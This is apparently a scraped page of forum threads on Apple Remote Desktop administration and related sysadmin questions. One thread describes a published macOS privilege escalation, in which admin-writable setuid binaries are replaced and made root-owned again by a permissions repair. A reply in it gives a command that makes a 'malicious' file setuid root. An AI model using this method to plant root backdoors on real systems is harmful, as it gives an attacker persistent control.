Local Privilege Escalation via ARD

Similar Messages

• Mac OS X Local Privilege Escalation Vulnerabilities

  Yes this has happened to me
  I found out about it on this site:
  http://projects.info-pull.com/moab/MOAB-15-01-2007.html
  It effects desk utility.
  If you have the below when you check you disk permissions
  Determining correct file permissions.
  Group differs on ./Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool, should be 80, group is 0
  Group differs on ./Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy, should be 80, group is 0
  Group differs on ./Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool, should be 80, group is 0
  There is a work around but I am not sure if I know how to do it. Can any one write me a step by step guide. IE open terminal cd into so & so that sort of thing. Also is their work around sound or just some other vulnerabilities.
  Please check out the link before answering.
  Thanks in advance
  PS Am I worried no not really we can only learn from these things

  This "exploit" or whatever you want to call it is absolutely ridiculous, in my opinion.
  "Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation. A malicious user can overwrite the binaries and perform a disk permissions repair operation via the diskutil tool, effectively setting back the default ownership and permissions (root setuid)."
  The file at "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool" is indeed a SetUID root helper tool which the Activity Monitor uses. It's owner is root, with a group of admin. Its parent folder is owned by root with a group of admin.
  A "Standard" non-privileged user, or in other words, a user for whom the "Allow user to administer this computer" checkbox isn't checked in System Preferences, cannot do anything to alter the pmTool. When that checkbox is enabled, the user is part of the "admin" group. Since the pmTool is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user can do nothing to alter it. Since the parent directory, /Applications/Utilities/Activity Monitor.app/Contents/Resources/, is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user cannot remove, add, or replace the contents, including the "pmTool".
  So what's left of this "exploit" is that a user that's an administrator could replace or modify the pmTool and use Disk Utility's Repair Permissions feature to "blindly" turn this malicious replacement executable into a SetUID root tool. They could then use this tool to wreak havoc on the system.
  My only comments are:
  1) Duh.
  2) Why the heck would you want to go through this convoluted procedure just to create a (malicious?) SetUID root executable? If you're an admin, there are much simpler methods available.
  If a user is an administrator, all they need to do to create a SetUID root tool is enter the following in the Terminal:
  sudo chmod 4755 /Users/mdouma46/Desktop/myMaliciousSetUIDTool; sudo chown 0:0 /Users/mdouma46/Desktop/myMaliciousSetUIDTool
  Just as effective, without all the convoluted "psuedo-exploit" stuff.
  So, where exactly is the exploit now?
  Dual 2.7GHz PowerPC G5 w/ 2.5 GB RAM; 17" MacBook Pro w/ 2 GB RAM -   Mac OS X (10.4.8)  

• AUDIT action (create, delete, privilege escalation, set and change password from users account and group) users and admins in Solaris 10

  Hello.
  in Solaris 10 i need auditing process create, delete, privilege escalation, set and change password and etc... from users account and group.
  I set settings:
  in file syslog.conf:
  *.info;mail.none;cron.none;audit.notice            @IP-Remote-syslog-server-SIEM
  in file   /etc/security/audit_control:
  dir:/var/audit
  flags:lo,ad,ex,cc,am,no,fc,fd
  minfree:20
  naflags:lo
  plugin:name=audit_syslog.so;p_flags=lo,ad,ex,cc,am,no
  in file   /etc/security/audit_user:
  root:lo,ad:no
  Now I see in the logs only the fact of a connection via SSH and run processes on behalf of users. Creation. delete users, change passwords for some reason do not is logged.
  Many users. For each individual write permissions in the file /etc/security/audit_user not possible, it is likely to forget any new user (or there is a possibility in this file one line to describe the audits for all accounts?)
  Where is the mistake?

  You are most likely hitting Bug 15779000 user/role/groupadd/mod/del don't audit their use.
  And the fix is only available in S11.2.
  -- Renaud

• Root vs. admin softwareupdate via ARD 2.0

  Hello,
  I've searched here and have not been able to find a similar post. I have an office of about 25 Tiger clients (10.4.6) which get their directory information via LDAP from a Tiger server(10.4.6). If I run softwareupdate from the GUI as an admin account or even from the command line as admin, softwareupdate looks to the local server, which is running the softwareupdate service. If, however, I run softwareupdate as root (which I have to do via ARD, from what I can tell) it checks Apple's servers and wants to download from them. This is a source of frustration because I don't want to have to visit every machine, nor do I prefer to download updates on my admin machine and then push the package out with ARD.
  I'm wondering if using softwareupdate via root is designed to work this way, or if it's a bug. If it's a bug, I'll report it to Apple.
  If this has happened to any of you, please resond with your solution.
  By the way, if I send this command:
  sudo -u admin softwareupdate -i -a
  via ARD as root user, I am prompted for a password, which I'm not sure how to enter. The task just fails.
  Thanks in advance!
  Sean

  It sounds like your group is pushing out Workgroup Management (MCX) from your MacOS X Server box, specifically they are setting the Software Update server. But it sounds like they are setting this as a policy based on groups, rather than on computers. So since root is not in any of the groups managed by the MCX settings, when you run Software Update it is not set, and is defaulting to the built-in address.
  If you really wanted to do it without making changes (if they don't want to put that in for "guest" computers and every other one), then you could use:
  defaults write /Library/Preferences/com.apple.SoftwareUpdate CatalogURL http://your.softwareupdateserver.com:8088/
  note that that last goes all on one line, and is taken from afp548.com.

• Adobe Reader XI privilege escalation

  ...I know, this is not really a privilege escalation in the classical way...
  Hi.
  With both the current versions of Adobe Reader X and XI, standard users are able to repair adobe reader going via appwiz.cpl/control panel.
  Problem is: if reader is opened, Windows needs to restart to finish repairing...problem is, even if standard users are NOT allowed to restart the computer (think of terminal servers with dozens of clients logged on), they MAY restart the server, causing real trouble. So even with GPOs in place that deny standard users the privilege to shutdown/restart the computer, buggy Adobe Reader makes it possible.
  Side note: while UAC will prompt users to supply admin credentials when trying to uninstall Adobe Reader, it does not prompt when trying to repair. That's the bug.
  Tested on win8/server 2012, Server 2008 R2. Adobe Reader 11.0.3/10.1.7

  http://www.adobe.com/devnet/reader.html
  You may want to check with the dev people about the shut down and how to disable it, this being a user-to-user forum, and not often frequented by development personnel. I'm sure there's a simple code change that will disable it, however, without the restart, the repair becomes useless as Reader cannot repoen until the proper reg keys and dll files are amended per the repair, but then you already know that.
  There may also be a code change to enable UAC for repairs. My understanding is that an uninstall may remove shared files, and that's the parameter for Windows to prompt with UAC. but the repair only changes installed files using existing files, so Windows doesn't see that as a potential for damage.

• Rename client computer via ARD and Automator

  Does anyone know of a method or action to rename (Computer name) Macs using AppleRemoteDesktop and Automator?
  I have over 700 laptops on a school network that I would like to rename based on a tab deliminated text file containing the all the mac (ethernet) addresses and the assocated user.
  I have tried sending a unix script and the text file via ARD to change the computer name via scutil, but it doesn't work consistently.

  You should be able to use AppleRemoteDesktop to rename the remote computer. Once you are connected to the remote computer, just go to "System Preferences...", and click on "Network" and change the computer name.
  If you are a non-administrator of ARD, you may need to turn on the access privilege to rename the remote computer. Go to "Preferences..." in ARD, and click on "Security" button, and turn the access privileges on.

• I need help, How could I add Aliases to Local Administrator account via terminal commands???

  I need help, How could I add Aliases to Local Administrator account via terminal commands???
  I want to use commands to add alias for existing administrator account remotly by using ARD.
  Thanks.

  Hi,
  a Windows Domain Controller does not have any local user or groups. So you might add the user to the admin group at Domain level.
  B RGDS,
  Gregor
  Edited by: Gregor Gasper on Jan 9, 2009 1:44 PM

• Trouble accessing a remote machine via ARD over a VPN

  Hi There,
  I'm having  trouble accessing a remote Workstation via ARD over a VPN.
  The VPN is set up and I can:
  - Control our 10.6 server via ARD remotely
  - Mount volums from the 10.6 server remotely
  - Access another server (we run an accounting server) remotely
  But we can't access a Workstation using ARD.
  I can connect to the Workstation when in the office so assume it's configured for access - I guess I suspect the issue lies with the Firewall on the 10.6 server and/or the Netgear FSV366G Firewall.
  The VPN is setup on the 10.6 server so figure it's something to do with Snow Leopard server?
  I'm just not sure how to narrow things down and fix the issue - although I setup the server I'm not super Unix savvy.
  Any help or pointers in the right direction would be much appreciated.
  Cheers
  Ben

  I can't say for certain what is going wrong in your case but I can confirm it is possible to do an ARD connection i.e. Screen Sharing to a remote user connected via a VPN. The way we do this is to get the user to connect to the VPN server (a Mac OS X Server), then on the Mac OS X Server in Server Admin see what IP address they have been allocated by the VPN server, then tell ARD Admin to connect to that IP address.
  This works fine for me.
  The IP address will be a 'local'  to the ARD and VPN machines IP address it would not be the remote public or private IP addresses.

• Root vs. admin softwareupdate via ARD

  Hello,
  I've searched here and have not been able to find a similar post. I have an office of about 25 Tiger clients (10.4.6) which get their directory information via LDAP from a Tiger server(10.4.6). If I run softwareupdate from the GUI as an admin account or even from the command line as admin, softwareupdate looks to the local server, which is running the softwareupdate service. If, however, I run softwareupdate as root (which I have to do via ARD, from what I can tell) it checks Apple's servers and wants to download from them. This is a source of frustration because I don't want to have to visit every machine, nor do I prefer to download updates on my admin machine and then push the package out with ARD.
  I'm wondering if using softwareupdate via root is designed to work this way, or if it's a bug. If it's a bug, I'll report it to Apple.
  If this has happened to any of you, please resond with your solution.
  By the way, if I send this command:
  sudo -u admin softwareupdate -i -a
  via ARD as root user, I am prompted for a password, which I'm not sure how to enter. The task just fails.
  Thanks in advance!
  Sean
  PowerBook G4 / 15 / 1.67GB / SD   Mac OS X (10.4.6)  

  It sounds like your group is pushing out Workgroup Management (MCX) from your MacOS X Server box, specifically they are setting the Software Update server. But it sounds like they are setting this as a policy based on groups, rather than on computers. So since root is not in any of the groups managed by the MCX settings, when you run Software Update it is not set, and is defaulting to the built-in address.
  If you really wanted to do it without making changes (if they don't want to put that in for "guest" computers and every other one), then you could use:
  defaults write /Library/Preferences/com.apple.SoftwareUpdate CatalogURL http://your.softwareupdateserver.com:8088/
  note that that last goes all on one line, and is taken from afp548.com.

• Deploying AppleMail settings via ARD - is it possible?

  Hello,
  I want to set AppleMail settings for about 50 Users via ARD.
  First of all IMAP settings, next account details based on the local non-admin user.
  Any idea?
  Thanks a lot!
  Jochen

  ARD cant do this directly, but you can send an OSA script to do this. Here is one I use. You send a UNIX command:
  osascript -e 'tell application "System Events"' -e 'keystroke "q" using command down' -e 'end tell'
  You can string together commands by using -e. This comes in really useful for product serial numbers, for instance:
  osascript -e 'tell application "System Events"' -e 'keystroke "Company Name"' -e 'keystroke tab' -e 'keystroke "Company Location"' -e 'keystroke tab' -e 'delay 2' -e 'keystroke "REALLY long pointless serial number"' -e 'delay 2' -e 'keystroke return' -e 'end tell'
  In this example, "delay 2" means wait two seconds. Older systems / apps will actually have an issue with receiving the keystrokes to fast, and do nothing. Quark is the worst offender here, and I need to run a delay of 5 seconds, even on mac Pros.
  I also use it for logging in a bunch of system as a maintenance user. I will log out everyone, and then issue:
  osascript -e 'tell application "System Events"' -e 'keystroke "Service User"' -e 'keystroke tab' -e 'delay 2' -e 'keystroke "myPasswordHere"' -e 'delay 2' -e 'keystroke return' -e 'keystroke return' -e 'end tell'
  You will notice here that you need to hit enter twice... This is a bug in the login system. 50% of your systems will not continue with hitting enter only once in script (although they work perfectly fine hitting enter once at the keyboard).
  Hope this helps.

• How can I 'login' as a different user via ARD?

  It has been too many years and I cannot remember much of anything anymore...
  My main computer is running the ARD admin app. I have a 'server' that has the
  client software installed and setup to auto login to my admin account on the 'server'.
  I can easily connect to the server using ARD... however I would like to connect
  as a different user ( the postgresql admin account).
  Is is possible to do this via the ARD software?
  If I log out on my main admin account on the server while connected via ARD
  then the remote desktop software on my main
  computer reports that ARD in no longer active on the server client and I cannot access
  the server via ARD without rebooting the server.
  The help menu in ARD gives an Applescript that supposedly will allow a login from
  the clients login screen but I don't seem to recall how to setup the client so
  that one can access the server if the login screen is up...
  I am running the latest everything...
  In short-- Can I use ARD to connect as different users on a client machine? ( if so how)
  Thanks
  Jerry

  Ok,
  Never mind...
  I enabled postgres in the sharing panel.
  When I log out I get the login screen and I can directly
  login to the postgres account via ARD.
  Thanks
  Jerry

• I am unable to connect to my RackSpace Windows Server via ARD. I have added a computer entering the ip address, username, and password but I can't establish a connection. I am missing a setting or to step that is different in ARD?

  I am unable to connect to my RackSpace Windows Server via ARD. I have added a computer entering the ip address, username, and password but I can't establish a connection. I am missing a setting or to step that is different in ARD?

  ARD only works with Windows computers if the Windows computer is running VNC server software.  Even then it can only control and observe.  Do you have this installed?

• Pushing out a script to run via ARD

  I have the following script I am running into two issues with
  1)  Instead of running it as root, can we run as a member of the admin group.
  2)  Can this be pushed out via ARD?
  #!/bin/bash
  #This script needs to run as root
  ROOT_UID=0
  if [[ $UID -ne $ROOT_UID ]]; then
  echo "YOU MUST BE ROOT TO RUN THIS SCRIPT"
  exit 1
  fi
  OLD="<string>The owner or any administrator can unlock the screensaver.<\/string>"
  NEW="<string>(Use SecurityAgent.) The owner or any administrator can unlock the screensaver.<\/string>"
  cp /private/etc/authorization /tmp/auth.tmp
  sed "s/$OLD/$NEW/" /tmp/auth.tmp > /tmp/authorization
  mv /private/etc/authorization /private/etc/authorization.previous
  mv /tmp/authorization /private/etc/authorization
  rm /tmp/auth.tmp

  Do not remove the "root user reference" from the script. Without "the reference" the script will place a modified authorization file in the /tmp directory. To modify the /private/etc/authorization file you must be root or an admin user with the proper authorization (You would use sudo in the shell environment). Here's a safer and cleaner version of that script->
  #!/bin/bash
  OLD="<string>The owner or any administrator can unlock the screensaver.<\/string>"
  NEW="<string>(Use SecurityAgent.) The owner or any administrator can unlock the screensaver.<\/string>
  # use sed to make a backup of the original file then edit the file in place
  /usr/bin/sed -i.previous "s/$OLD/$NEW/" /private/etc/authorization

• Unix command to update Microsoft Office 2008 via ARD

  I'm looking for a unix command I can send via ARD to update Microsoft Office 2008. It just needs to install all updates and then restart. Kinda like apple's software update one: softwareupdate -i -a; shutdown -r now

  Why go through all the trouble of trying to do it in Unix.  Apple and Microsoft made it a LOT easier.
  Just download the update from Mactopia
  Open the .dmg
  (for convience and ability to have it stored) Drag the Update from the Microsoft folder that opens up and put the update on your desktop
  In ARD Select what computer(s) you want to install the update in
  Use ARD Install function to install the update
  Go have a cup of coffee and a donut while ARD does the install.
  You do not even have to do a restart.  Microsoft uses a different icon for the update but it still is a package file operation.

• Adobe apps fail to launch after copying via ARD 3

  For several years we have beeen updating our Adobe apps by updating our master image and copying (via ARD v.1, then v.2, now v. 3) the applications and the associated Application Support files to the target machines. (300 Macs running Tiger) Since upgrading to version 3 of ARD. Adobe apps fail to launch after they are replaced, even with the old files.
  I found a post alluding to a known issue with Acrobat from June. It stated it was a known bug that engineering was aware of. THAT was the only mention I could find. Does anyone know anything more about this? This is critical for our publishing workflow - Adobe has two updates that affect us in critical areas that we need to implement, but are reluctant to visit 300 individual desktops (even remotely) and run individual install patches.
  The silent install works great for installation, but does not address updates.
  Anyone?
  Mac OS X (10.4.7)
    Mac OS X (10.4.7)  

  Just FYI. I only had problems with InDesign not launching but this was a know issue with Adobe:
  http://www.adobe.com/support/techdocs/331578.html